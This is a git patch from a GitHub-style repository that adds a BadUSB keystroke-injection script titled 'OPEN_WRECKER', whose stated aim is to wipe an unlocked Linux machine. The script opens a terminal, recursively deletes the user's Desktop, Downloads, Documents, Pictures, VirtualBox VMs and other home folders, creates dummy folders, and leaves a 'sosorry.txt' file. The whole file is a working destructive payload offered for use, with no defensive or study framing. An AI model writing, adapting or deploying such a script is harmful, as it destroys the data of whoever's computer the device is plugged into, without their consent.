From 6af99b653c1e37fc092e27a612d3bdee708a507a Mon Sep 17 00:00:00 2001 From: David Martinez <130254086+FLIZZ3R@users.noreply.github.com> Date: Sat, 8 Apr 2023 18:59:47 -0700 Subject: [PATCH] Create Open_WreckerV1_Badusb_Linux --- Open_WreckerV1_Badusb_Linux | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 Open_WreckerV1_Badusb_Linux diff --git a/Open_WreckerV1_Badusb_Linux b/Open_WreckerV1_Badusb_Linux new file mode 100644 index 00000000..31c93647 --- /dev/null +++ b/Open_WreckerV1_Badusb_Linux @@ -0,0 +1,21 @@ +REM Author: FLIZZ3R +REM TITLE: OPEN_WRECKER +REM OBJECTIVE: wipe open linux machines Directories then create dummy directories and sorry text file + +DELAY 500 +WINDOWS d +DELAY 300 +CTRL-ALT t +DELAY 1500 +STRING rm -r Desktop Downloads Pictures snap Documents Music Public Templates 'VirtualBox VMs' +ENTER +DELAY 1500 +STRING mkdir Deskop downloadz Pics Dox Music Public TEMPS Vms +ENTER +DELAY 500 +STRING cd Deskop +ENTER +DELAY 500 +STRING touch sosorry.txt +ENTER +ALT F4